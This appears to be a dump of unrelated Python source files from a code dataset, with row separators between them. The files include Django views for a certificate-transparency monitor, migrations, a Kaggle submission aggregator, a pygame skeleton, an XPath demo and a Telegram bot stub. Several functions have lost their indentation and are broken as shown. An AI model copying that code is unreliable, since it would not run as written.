            name='extras',
            field=models.ManyToManyField(related_name='compositions', to='mainapp.Extra', verbose_name='Extras'),
        ),
        migrations.AddField(
            model_name='composition',
            name='menu',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.menu', verbose_name='Name'),
        ),
        migrations.AddField(
            model_name='composition',
            name='selected_foods',
            field=models.ManyToManyField(through='mainapp.CompositionFood', to='mainapp.Food', verbose_name='Selected Foods'),
        ),
        migrations.CreateModel(
            name='Address',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('address', models.TextField(max_length=1000, verbose_name='Address')),
                ('client', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='mainapp.client', verbose_name='Client')),
            ],
            options={
                'verbose_name': 'Address',
                'verbose_name_plural': 'Addresses',
                'ordering': ('id',),
            },
        ),
    ]
|
6,378 | 9aeaab445ae9df5c27cc4375a8b6bf320d5ab873 | #代码整体框架
#引用库
#创建窗口
def GameStart():
    """Skeleton of the main game loop (placeholders only -- no logic yet)."""
    # background image surface
    Background = pygame.image.load()
    # paddle image surface
    Baddle = pygame.image.load()
    # ball image surface
    Ball = pygame.image.load()
    # paddle position (placeholders -- not yet assigned)
    BaffleX
    BaffleY
    # ball position and speed (placeholders -- not yet assigned)
    BallX
    ballY
    BallSpeed
    # frame-rate Clock object (TODO)
    # on-screen timer Clock object (TODO)
    # timer font (TODO)
    # game result (TODO)
    while True:
        # handle incoming events (TODO)
        # draw the background (TODO)
        # draw the timer (TODO)
        # draw the ball (TODO)
        # ball boundary checks (TODO)
        # recompute the paddle position after movement (TODO)
        # paddle boundary checks (TODO)
        # flip the display (TODO)
        # fix: a loop body made only of comments is a SyntaxError
        pass
def GameResult():
    """Skeleton of the result screen (placeholders only)."""
    # result-screen background Surface (TODO)
    # result guidance text (TODO)
    # result Font object (TODO)
    # restart button (TODO)
    # restart hover button (TODO)
    # game result (TODO)
    # fix: a function body made only of comments is a SyntaxError
    pass
if __name__ == "__main__":
    # fix: the original guard had an empty suite, which is a SyntaxError.
    # TODO: call GameStart() / GameResult() once they are implemented.
    pass
|
6,379 | 8c1bd4df5f33c433880d6a4becadf88fb922762b | import os
from flask import Flask
from flask.ext.login import LoginManager
from config import basedir
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.openid import OpenID
from momentjs import momentjs
# NOTE(review): this module relies on the legacy ``flask.ext.*`` import
# namespace (see imports above), which was removed in Flask 1.0 -- either
# the project is pinned to an old Flask, or the imports need updating to
# flask_login / flask_sqlalchemy / flask_openid.
app = Flask(__name__)
app.config.from_object('config')  # settings come from config.py
db = SQLAlchemy(app)  # shared SQLAlchemy handle used by the models
lm = LoginManager()
lm.init_app(app)
app.jinja_env.globals['momentjs'] = momentjs  # expose moment.js helper to templates
# imported at the bottom on purpose: views/models import ``app``/``db`` from
# this module, so a top-of-file import would be circular
from app import views, models
|
6,380 | fe0b21deb2e48ad74449b264265729cb328090ea | import os
from sklearn import metrics
import pandas as pd
import numpy as np
from submission import submission
import argparse
import glob
def calc_auc(subm):
    """Return ROC AUC of a submission frame ('target' = predictions,
    'labels' = ground truth); returns 0 with a warning when only a
    single class is present (AUC is undefined then)."""
    labels = subm['labels'].values
    preds = subm['target'].values
    if len(set(labels)) == 1:
        print('warning calc_auc with single label dataset, return 0')
        return 0
    return metrics.roc_auc_score(labels, preds)
def save_submission(df, name, do_submit=False):
    """Write the ['image_name', 'target'] columns of ``df`` to CSV and,
    when ``do_submit`` is True, upload it via the kaggle CLI."""
    df_submission = df[['image_name', 'target']]
    df_submission.to_csv(name, index=False)
    if do_submit:
        # NOTE(review): the file name is interpolated into a shell command;
        # double quotes protect spaces but not embedded quotes -- fine for
        # locally generated names, but subprocess.run([...]) would be safer.
        name_with_quotes='\"'+name+'\"'
        os.system(f'kaggle competitions submit -c siim-isic-melanoma-classification -f {name_with_quotes} -m {name_with_quotes}')
def main(nfolds, work_dir):
    """Aggregate per-fold validation/test submission CSVs in ``work_dir``.

    For every combination of label-encoding variant ('' / 'le') and TTA
    variant ('' / 'tta_'): prints per-fold and average AUC on the validation
    files, then averages the per-fold test submissions into one ensemble
    submission and saves kaggle-ready CSVs.

    Returns:
        tuple: (avg validation TTA AUC with 'le', avg validation TTA AUC
        without 'le'); entries stay None if the files were absent.
    """
    val_avg_tta_le_auc=None
    val_avg_tta_auc = None
    tta_type='tta_'
    # --- validation files: report AUC per fold and the fold average ---
    for le in ['', 'le']:
        for m_type in ['', tta_type]:
            a = []
            for fold in range(nfolds):
                if len(le)>0:
                    name = f'val_le_{fold}_single_model_{m_type}submission.csv'
                else:
                    name = f'val_{fold}_single_model_{m_type}submission.csv'
                filename=os.path.join(work_dir, name)
                if os.path.exists(filename):
                    sub = pd.read_csv(filename)
                    a.append(calc_auc(sub))
            print(f'{le}_val_single_model_{m_type}metrics={a}')
            print(f'{le}_val_single_model_{m_type}avg_metric={np.mean(a)}')
            if m_type==tta_type:
                if le=='le':
                    val_avg_tta_le_auc=np.mean(a)
                else:
                    val_avg_tta_auc=np.mean(a)
    # --- test files: save per-fold kaggle CSVs and the fold-averaged ensemble ---
    for le in ['', 'le']:
        for m_type in ['', 'tta_']:
            a = []
            subs = []
            for fold in range(nfolds):
                if le=='':
                    name = f'test_{fold}_single_model_{m_type}submission.csv'
                else:
                    name = f'test_{le}_{fold}_single_model_{m_type}submission.csv'
                filename=os.path.join(work_dir, name)
                if os.path.exists(filename):
                    sub = pd.read_csv(filename)
                    a.append(calc_auc(sub))
                    save_submission(sub, os.path.join(work_dir, 'kaggle_' + name))
                    subs.append(sub)
            if subs:
                # ensemble: average the per-fold predictions
                avg_sub = submission.aggregate_submissions(subs)
                auc_avg_sub=calc_auc(avg_sub)
                save_submission(avg_sub, os.path.join(work_dir, 'kaggle_' + f'test_{le}_{m_type}.csv'))
            else:
                auc_avg_sub=None
            print(f'{le}_test_single_model_{m_type}metrics={a}')
            print(f'{le}_test_single_model_{m_type}avg_metric={np.mean(a)}')
            print(f'{le}_test_avg_model_{m_type}_metric={auc_avg_sub}')
    return val_avg_tta_le_auc, val_avg_tta_auc
parser = argparse.ArgumentParser()
parser.add_argument('--work_dir',type=str)
parser.add_argument('--folds',type=int, default=0)

if __name__=="__main__":
    args=parser.parse_args()
    if args.folds==0:
        # infer the fold count from the loss*.png plots saved per fold
        nfolds = len(glob.glob(os.path.join(args.work_dir,'loss*.png')))
        print(f' --folds not specified, will use {nfolds}')
    else:
        nfolds=args.folds
    main(nfolds,args.work_dir)
|
6,381 | bcc959dcdb60c55897158e85d73c59592b112c12 | from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from django.db.models import Count
from django.db.models import QuerySet
from django.db import connection
from django.core.paginator import Paginator, PageNotAnInteger
from django.http import HttpResponse
from django.http import HttpResponsePermanentRedirect
import datetime
import os
import json
from ctobservatory.settings import BASE_DIR
from .models import *
from notification.forms import SubscribeUnsubscribeForm
#from .issuefinder import *
import observer.issuefinder as issuefinder
from django.template.defaulttags import register
import hashlib
import psycopg2
ITEMS_PER_PAGE = 50
@register.filter
def get_item(dictionary, key):
return dictionary.get(key)
class FastCountQuerySet():
    """Queryset wrapper that replaces the expensive COUNT(*) with the
    planner's row estimate from ``pg_class.reltuples`` (PostgreSQL only).

    Everything except ``count()`` is delegated to the wrapped queryset,
    so instances can be handed to a ``Paginator`` as a drop-in
    replacement for the original queryset.
    """

    def __init__(self, queryset, tablename):
        self.queryset = queryset
        self.tablename = tablename

    def count(self):
        """Return the approximate row count of ``tablename``.

        ``reltuples`` is an estimate maintained by VACUUM/ANALYZE; that
        is good enough for pagination totals and avoids a full scan.
        """
        with connection.cursor() as cursor:
            cursor.execute(
                "SELECT reltuples FROM pg_class WHERE relname = %s",
                [self.tablename])
            row = cursor.fetchone()
        return int(row[0])

    def __getattr__(self, attr):
        # __getattr__ only fires after normal attribute lookup fails, so
        # plain delegation suffices.  (The previous try/except around
        # object.__getattr__ was dead code: ``object`` defines no
        # __getattr__, so that lookup always raised AttributeError.)
        return getattr(self.queryset, attr)

    def __getitem__(self, item):
        return self.queryset[item]
class MetadataCountQuerySet():
    """Queryset wrapper whose ``count()`` reads a pre-computed total from
    the ``metadata`` table instead of issuing COUNT(*) over the queryset.

    Everything except ``count()`` is delegated to the wrapped queryset,
    so instances can be handed to a ``Paginator`` unchanged.
    """

    def __init__(self, queryset, propertyname):
        self.queryset = queryset
        self.propertyname = propertyname

    def count(self):
        """Return int(metadata.name_value) for the row whose name_type
        equals ``propertyname``."""
        with connection.cursor() as cursor:
            cursor.execute(
                "SELECT name_value FROM metadata WHERE name_type = %s",
                [self.propertyname])
            row = cursor.fetchone()
        return int(row[0])

    def __getattr__(self, attr):
        # __getattr__ only fires after normal lookup fails, so direct
        # delegation is all that is needed; the old object.__getattr__
        # probe was dead code (object has no __getattr__).
        return getattr(self.queryset, attr)

    def __getitem__(self, key):
        return self.queryset[key]
def index(request):
    """Render the landing page with aggregate statistics.

    All counters are read from the pre-computed ``metadata`` table
    (kept up to date by the analyzer job) so this view never runs
    COUNT(*) over the large certificate tables.
    """
    metadata = {}
    messages = []
    # One-shot flash messages set via redirect query parameters after a
    # subscribe / unsubscribe request was submitted.
    if('subok' in request.GET):
        messages.append({'class':'alert-info','text':'<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'})
    if('unsubok' in request.GET):
        # Typo fix: message previously read "sClick it".
        messages.append({'class':'alert-info','text':'<strong>Unsubscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'})
    subscribeform = SubscribeUnsubscribeForm()
    with connection.cursor() as c:
        c.execute("SELECT NAME_TYPE, NAME_VALUE FROM metadata")
        for name_type, name_value in c.fetchall():
            metadata[name_type] = name_value
    return render(request, 'observer/index.html',
        {
            'total_certs': metadata['number_of_certs'],
            'total_ca': metadata['number_of_cas'],
            'total_logs': CtLog.objects.count(),
            'active_certs': metadata['number_of_active_certs'],
            'expired_certs': metadata['number_of_expired_certs'],
            'revoked_certs': metadata['number_of_revoked_certs'],
            'misissued_certs': metadata['number_of_misissued_certs'],
            'behaving_cas' : metadata['number_of_correctly_behaving_cas'],
            'interesting_cas' : metadata['number_of_interesting_cas'],
            'biggest_log' : metadata['number_of_certs_in_biggest_log'],
            'biggest_log_name' : CtLog.objects.get(id=metadata['biggest_log_id']).name,
            'smallest_log' : metadata['number_of_certs_in_smallest_log'],
            'uptime_days': (timezone.now().date()-datetime.date(2015,10,14)).days, #TODO
            'messages' : messages,
            'subscribeform' : subscribeform
        }
    )
def search(request):
    """Render the search page for the query in the ``term`` GET
    parameter; the actual lookups happen in the dedicated list views."""
    query = request.GET.get("term", "")
    context = {'term': query}
    return render(request, 'observer/search.html', context)
def caall(request, page=None): #VIEW FOR CAs
    """Paginated, filterable list of all CAs ordered by common name."""
    if(page==None):
        return HttpResponsePermanentRedirect("all/1")
    page = int(page)
    list_of_certs = []
    # CaFilter both renders the filter form and applies GET filters.
    filtered_qs = CaFilter(
        request.GET,
        queryset=Ca.objects.all().order_by('common_name')
    )
    paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
    # NOTE(review): the converted path segment ``page`` above is discarded
    # here in favour of the ?page= query parameter; the int() call only
    # rejects non-numeric path segments (ValueError -> 500). Confirm this
    # is intentional before changing.
    page = request.GET.get('page')
    try:
        list_of_certs = paginator.page(page)
    except PageNotAnInteger:
        # Non-numeric / missing ?page= falls back to the first page.
        list_of_certs = paginator.page(1)
    return render(request, 'observer/cas.html',
        {
            'list_of_ca': list_of_certs,
            'filter': filtered_qs#Ca.objects.annotate(num_certs=Count('certificate')).order_by('-num_certs'),
        }
    )
def certall(request, page=None, ae=None, issuer_ca=None): #VIEW FOR Certificates->ALL
    """Paginated list of all certificates with ad-hoc GET filtering.

    NOTE(review): the ``ae``/``issuer_ca`` keyword arguments are
    immediately overwritten from request.GET below, and ``page`` is
    re-read from the query string after the int() conversion.
    """
    if(page==None):
        return HttpResponsePermanentRedirect("all/1")
    ae = request.GET.get("algorithm")
    issuer_ca = request.GET.get("issuer_ca")
    date_notbefore = request.GET.get("date_notbefore")
    date_notbefore_gte = request.GET.get("date_notbefore_gte")
    is_active = request.GET.get("is_active")
    date_notafter = request.GET.get("date_notafter")
    date_notafter_lte = request.GET.get("date_notafter_lte")
    page = int(page)
    list_of_certs = []
    # CertFilter is used for the filter form in the template; the actual
    # pagination below bypasses it for performance.
    filtered_qs = CertFilter(
        request.GET,
        queryset=MetadataCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')
    )
    paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
    page = request.GET.get('page')
    #Alternative filter solution for better performance
    #https://localhost/cert/all/1?issuer_ca=merge&date_notbefore=&date_notbefore_gte=&is_active=&date_notafter=&date_notafter_lte=
    query = FastCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')
    paginator = Paginator(query, ITEMS_PER_PAGE)
    # NOTE(review): the two branches below are near-duplicates and their
    # conditions overlap (is_active == "" / None enters both); because the
    # later assignments win, ambiguous combinations end up with the
    # "expired" variant (not_after <= today). Confirm before refactoring.
    if(is_active == "1" or is_active == "" or is_active == None):
        if(issuer_ca != None and (is_active == None or is_active == "")):
            query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')
            paginator = Paginator(query, ITEMS_PER_PAGE)
        if(is_active != None and (issuer_ca == None or issuer_ca == "")):
            query = FastCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'certificate')
        if(issuer_ca == "" and is_active == ""):
            query = FastCountQuerySet(Certificate.objects.all(), 'certificate')
            paginator = Paginator(query, ITEMS_PER_PAGE)
        if(is_active != None and issuer_ca != None ):
            query = FastCountQuerySet(Certificate.objects.filter(
                issuer_ca__common_name__contains = issuer_ca,
                not_before__lte=timezone.now(), not_after__gte=timezone.now(), ), 'certificate')
            paginator = Paginator(query, ITEMS_PER_PAGE)
    if(is_active == "0" or is_active == "" or is_active == None):
        if(issuer_ca != None and (is_active == None or is_active == "")):
            query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')
            paginator = Paginator(query, ITEMS_PER_PAGE)
        if(is_active != None and (issuer_ca == None or issuer_ca == "")):
            query = FastCountQuerySet(Certificate.objects.filter(not_after__lte=datetime.date.today()), 'certificate')
        if(issuer_ca == "" and is_active == ""):
            query = FastCountQuerySet(Certificate.objects.all(), 'certificate')
            paginator = Paginator(query, ITEMS_PER_PAGE)
        if(is_active != None and issuer_ca != None ):
            query = FastCountQuerySet(Certificate.objects.filter(
                issuer_ca__common_name__contains = issuer_ca,
                not_after__lte=datetime.date.today() ), 'certificate')
            paginator = Paginator(query, ITEMS_PER_PAGE)
    ####################################################
    try:
        list_of_certs = paginator.page(page)
    except PageNotAnInteger:
        # Non-numeric / missing ?page= falls back to the first page.
        list_of_certs = paginator.page(1)
    #if(ae != None):
        #list_of_certs = Certificate.objects.raw("SELECT * FROM certificate WHERE SIGNATURE_ALGORITHM=%s", [ae])
    return render(request, 'observer/certs.html',
        {
            'list_of_certs': list_of_certs,
            'filter': filtered_qs
        }
    )
def certactive(request, page=None):
if(page==None):
return HttpResponsePermanentRedirect("active/1")
page = int(page)
list_of_certs = []
paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'number_of_active_certs'), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certexpired(request, page=None, order=None):
    """Paginated list of certificates whose validity period has ended."""
    if page is None:
        return HttpResponsePermanentRedirect("expired/1")
    page_number = int(page)
    expired = Certificate.objects.filter(not_after__lt=timezone.now())
    # MetadataCountQuerySet avoids a COUNT(*) by reading the pre-computed
    # total from the metadata table.
    paginator = Paginator(
        MetadataCountQuerySet(expired, 'number_of_expired_certs'),
        ITEMS_PER_PAGE)
    certs = paginator.page(page_number) if page_number in paginator.page_range else []
    return render(request, 'observer/certs.html', {'list_of_certs': certs})
def certrevoked(request, page=None):
if(page==None):
return HttpResponsePermanentRedirect("revoked/1")
page = int(page)
list_of_certs = []
paginator = Paginator(Certificate.objects.filter(id__in=RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certs_by_log(request, log_id, page=None):
    """Paginated list of the log entries recorded for one CT log."""
    if(page==None):
        return HttpResponsePermanentRedirect("./1")
    page = int(page)
    log_id = int(log_id)
    # Bug fix: list_of_entries was previously only assigned inside the
    # page-range check, raising NameError at render time for an
    # out-of-range page.  (The old unused ``list_of_certs`` is gone.)
    list_of_entries = []
    paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id), ITEMS_PER_PAGE)
    if(page in paginator.page_range):
        list_of_entries = paginator.page(page)
    return render(request, 'observer/log_certs.html',
        {
            'log': get_object_or_404(CtLog, pk=log_id),
            'list_of_entries' : list_of_entries
        }
    )
def certs_by_ca(request, ca_id, page=None):
if(page==None):
return HttpResponsePermanentRedirect("certificates/1")
page = int(page)
ca_id = int(ca_id)
list_of_certs = []
filtered_qs = CertFilter(
request.GET,
queryset=Certificate.objects.filter(issuer_ca=ca_id)
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs,
'filter': filtered_qs
})
# paginator = Paginator(Certificate.objects.filter(issuer_ca=ca_id), ITEMS_PER_PAGE)
# if(page in paginator.page_range):
# list_of_certs = paginator.page(page)
# return render(request, 'observer/certs.html',
# {
# 'list_of_certs': list_of_certs
# }
# )
def list_cn_certs(request, cn):
field_id = 'common name'
expression = cn
list_of_certs = Certificate.objects.raw("SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC", [cn])
#list_of_certs = Certificate.objects.filter(certificate__common_name=cn).order_by('not_before')
issues = issuefinder.get_all_issues(list(list_of_certs))
#issues = issuefinder.get_first_certificates(list_of_certs)
return render(request, 'observer/history.html',
{
'field_id': field_id,
'expression': expression,
'list_of_certs': list_of_certs,
'issues':issues
}
)
def list_dnsname_certs(request, dnsname):
field_id = 'dnsname'
expression = dnsname
list_of_certs = Certificate.objects.raw("SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC", [dnsname])
issues = issuefinder.get_all_issues(list(list_of_certs))
return render(request, 'observer/history.html',
{
'field_id': field_id,
'expression': expression,
'list_of_certs': list_of_certs,
'issues':issues
}
)
def log(request): #LOG VIEW
return render(request, 'observer/logs.html',
{
#'list_of_logs': CtLog.objects.all().annotate(entries=Count('ctlogentry')).order_by('latest_entry_id')
'list_of_logs': CtLog.objects.all().order_by('-is_active','-latest_entry_id','name')
}
)
def cadetail(request, ca_id):
    """Detail page for one CA, including how many certificates it issued."""
    ca = get_object_or_404(Ca, pk=ca_id)
    issued_count = Certificate.objects.filter(issuer_ca=ca_id).count()
    return render(request, 'observer/cadetail.html',
                  {'ca': ca, 'number_of_issued_ca': issued_count})
def certdetail(request, cert_id=None, cert_sha256=None):
    """Show the detail page for one certificate, addressed either by
    primary key or by its hex-encoded SHA-256 fingerprint.

    Bug fixes: ``str.decode('hex')`` does not exist on Python 3
    (replaced with ``bytes.fromhex``), and the fingerprint path
    previously left ``cacert``/``digest_sha256`` unassigned, raising
    NameError at render time.
    """
    if cert_sha256:
        cert_sha256_bin = bytes.fromhex(cert_sha256)
        cert = get_object_or_404(Certificate, certificate__sha256=cert_sha256_bin)
        cert_id = cert.id
    else:
        cert = get_object_or_404(Certificate, pk=cert_id)
    cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()
    # [2:-1] strips the surrounding b'...' of the bytes repr produced by
    # str() — presumably get_digest_sha256() returns bytes; TODO confirm.
    digest_sha256 = str(cert.get_digest_sha256()).replace(':','').lower()[2:-1]
    #TODO keysize distribution:
    #Certificate.objects.raw("select (select count(*) from certificate WHERE x509_keySize(certificate) = %s)*100/cast(COUNT(*) as float) as percentage, 0 as id FROM certificate;",
    #[cert.get_x509_data().get_pubkey().bits()])
    return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': 'TODO', 'digest_sha256':digest_sha256})
def certraw(request, cert_id):
    """Download the certificate's raw bytes as a file attachment."""
    cert = get_object_or_404(Certificate, pk=cert_id)
    response = HttpResponse(cert.certificate, content_type='application/octet-stream')
    # Bug fix: the filename previously lacked its closing double quote.
    response['Content-Disposition'] = 'attachment; filename="certificate_{}.crt"'.format(cert_id)
    return response
def logdetail(request,log_id):
log = get_object_or_404(CtLog, pk=log_id)
number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()
return render(request, 'observer/logdetail.html', { 'log' : log, 'number_of_issued_ca' : number_of_issued_ca})
def flag(request, flag_id):
    """Serve the PNG flag for *flag_id*, falling back to the placeholder
    flag ("-") when no image exists for that country code."""
    primary = os.path.join(BASE_DIR, "static/flags/png/{0}.png".format(flag_id.lower()))
    fallback = os.path.join(BASE_DIR, "static/flags/png/-.png")
    try:
        source = open(primary, "rb")
    except IOError:
        source = open(fallback, "rb")
    with source as f:
        return HttpResponse(f.read(), content_type="image/png")
def imprint(request):
return render(request, 'observer/imprint.html')
def issues(request):
return render(request, 'observer/issues.html')
def status(request):
status = {'analyzer':{'lastrun':0}, 'monitor':{'lastrun':0}, 'msg':'ok'}
try:
with open('/static/data/status.json', 'r') as f:
status = json.load(f)
status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status['analyzer']['lastrun'])
status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status['monitor']['lastrun'])
except Exception as e:
status['msg'] = "Could not load status file."+str(e)
return render(request, 'observer/status.html', {'status':status})
def certcheck(request):
    """Serial-number lookup: POSTing a hex serial returns the matching
    certificate id(s), or the literal string "none" when nothing matches.
    GET renders the empty form.
    """
    if request.method == 'POST':
        serial_post = request.POST['serial']
        sqlQuery = """SELECT id FROM certificate WHERE serial=%s"""
        # NOTE(review): sqlQuery_commonName and current_time are assigned
        # but never used below.
        sqlQuery_commonName = """SELECT * FROM ca WHERE """
        current_time = str(datetime.datetime.now())
        serial_int = int(serial_post, 16)
        # Minimal big-endian two's-complement encoding of the serial —
        # presumably matching how the bytea column stores it; TODO confirm.
        serial = serial_int.to_bytes((serial_int.bit_length() + 15) // 8, 'big', signed=True) or b'\0'
        sqlData = (psycopg2.Binary(serial),)
        found_serial = Certificate.objects.raw(sqlQuery, sqlData)
        # Truth-testing the RawQuerySet executes the query here.
        if(found_serial):
            return HttpResponse(found_serial)
        else:
            return HttpResponse("none")
    return render(request, 'observer/checkserial.html', {})
|
6,382 | c4dcb94b7d6e45b875dccde752d3621e491f1076 | correction_list = {}
# Canonical game-title corrections: maps names as they appear in ROM
# dumps to the preferred display titles.  Built as a single dict literal
# (idiomatic, and self-contained) instead of key-by-key assignments.
correction_list = {
    "Legend of Zelda, The - Majora's Mask": "The Legend of Zelda - Majora's Mask",
    "Legend of Zelda, The - Ocarina of Time": "The Legend of Zelda - Ocarina of Time",
    "Doubutsu no Mori": "Animal Forest",
    "Bomberman 64 - The Second Attack!": "Bomberman 64: The Second Attack",
    "Tarzan": "Disney's Tarzan",
    "RR64 - Ridge Racer 64": "Ridge Racer 64",
}
6,383 | 5c5a0fd67a6d6e805b77ddfddfe959335daa3bad | import datetime
a = datetime.datetime.now()
while True:
print("""\
Welcome to HMS
1. Are you want enter data
2. Are you want see record
3. exit
""")
option = int(input("enter your option"))
print(option)
if option == 1:
print("""\
Select client name
1. Add Exercise
2. Add Dite
4. exit
""")
option1 =int(input("enter your option"))
if option1 == 1:
print("""\
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option2 =int(input("enter your option"))
option2 = option2-1
name = list[option2]
dec = input("enter the exercise name")
f = open(name,"a")
decs = dec+'--'+str(a)+'\n'
f.write(decs)
f.close()
print('successfuly data enter')
elif option1 == 2:
print("""\
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option2 =int(input("enter your option"))
option2 = option2-1
name = list[option2]
dec = input("enter the dite")
f = open(name,"a")
decs = dec+'--'+str(a)+'\n'
f.write(decs)
f.close()
print('successfuly data enter')
else:
break
elif option == 2:
print("""\
select name whose record you want see
1. Aditya
2. harsh
3. shivam
4. exit
""")
list=['Aditya', 'harsh','shivam']
option3 =int(input("enter your option"))
option3 = option3-1
name = list[option3]
f = open(name,"rt")
content =f.read()
print(content)
else:
break
|
6,384 | d2368ab243a0660cf98f1cf89d3d8f6cc85cefaa | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-10 12:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CompleteAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.CharField(max_length=200)),
('district', models.CharField(max_length=200)),
('city', models.CharField(max_length=200)),
('lendmark', models.CharField(max_length=200)),
('street', models.CharField(max_length=200)),
('pincode', models.IntegerField()),
],
),
migrations.CreateModel(
name='ContactDetail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone_num', models.IntegerField()),
('mobile_num', models.IntegerField()),
('tollfree_num', models.IntegerField()),
('website', models.URLField()),
('email', models.EmailField(max_length=254)),
],
),
migrations.CreateModel(
name='HospitalRegistration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hospital_name', models.CharField(max_length=200)),
('tagline', models.CharField(max_length=200)),
('chief_officer', models.CharField(max_length=100)),
('establishment_act', models.CharField(max_length=300)),
('issue_date', models.DateField(max_length=20)),
('number_of_bades', models.IntegerField()),
('about_us', models.TextField()),
('logo', models.ImageField(upload_to='Images/logo/')),
('hospital_photo', models.ImageField(upload_to='Images/hospital_photo/')),
('reg_certificate', models.ImageField(upload_to='Images/reg_certificate/')),
('license_certificate', models.ImageField(upload_to='Images/license_certificate/')),
],
),
]
|
6,385 | 3640f1df412b43b42fb4e856604508f698a208ad | from django.db import models
from skills.models import skill
from offres.models import Offer
# Create your models here.
class OfferRequirement(models.Model):
    # Join table linking a required skill to a job offer.
    # NOTE(review): default="" is a suspicious default for ForeignKey
    # columns — an FK default should be a valid primary key or be
    # omitted entirely; confirm before generating new migrations.
    skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING ,default="")
    offer = models.ForeignKey(Offer , on_delete=models.CASCADE, default="")
6,386 | 681750dbf489a6a32e9ef1d6f64d493cc252b272 | from .. import dataclass # trigger the register in the dataclass package
|
6,387 | 52c356b903b1fbb8cbf24c899ed86d7bf134a821 | # -*- coding: utf-8 -*-
from lxml import etree
if __name__ == '__main__':
# xpath可以解析网页中的内容,html或者xml类型的文件都是<>开头结尾,层次非常明显
# data = '''<div>
# <ul>
# <li class="item-0"><a href="http://www.baidu.com">百度</a></li>
# <li class="item-1"><a href="http://www.baidu.com">百度</a></li>
# </ul>
# </div>
# '''
# tree = etree.HTML(data)
# print(type(data))
# print(tree, type(tree), etree.tostring(tree).decode('utf-8'), sep='\n') # sep,一行打印一个数据
# result = tree.xpath('//li') # //,查找所有li
# for i in result:
# print('--------', etree.tostring(i).decode('utf-8'))
# result = tree.xpath('/html/body/div/ul/li') # / ,查找当前路径
# for r in result:
# print('===', etree.tostring(r).decode('utf-8'))
# class是标签的属性,xpath中用@表示属性
# result = tree.xpath('//li[@class="item-0"]') # 查询所有,//;查li,li;表示条件[]
# for r in result:
# print('--------', etree.tostring(r).decode('utf-8'))
# result = tree.xpath('//a')
# for r in result:
# print('--------', etree.tostring(r).decode('utf-8'))
# 获取a中文本内容
# result = tree.xpath('//a/text()')
# print(result)
# result = tree.xpath('//li[contains(@class, "0")]') # 提取出数据所有li中class属性包含0的元素
# for r in result:
# print('--------', etree.tostring(r).decode('utf-8'))
tree = etree.parse('./data.html')
# print(etree.tostring(tree, encoding='utf-8').decode('utf-8'))
# result = tree.xpath('//li[@id="hehe"]/text()')
# print(result)
result = tree.xpath('//div[@id="p"]//li')
for r in result:
print('--------', etree.tostring(r, encoding='utf-8').decode('utf-8'))
|
6,388 | dcb2351f9489815fbec8694b446d0a93972a6590 | """1) Написать бота-консультанта, который будет собирать информацию с
пользователя (его ФИО, номер телефона, почта, адресс, пожелания).
Записывать сформированную заявку в БД (по желанию SQl/NOSQL).)."""
import telebot
from .config import TOKEN
from telebot.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton
from mongoengine import *
bot = telebot.TeleBot(TOKEN)
data = {}
connect('bot_db')
class User(Document):
surname = StringField(required=True)
name = StringField(required=True)
middle_name = StringField(required=True)
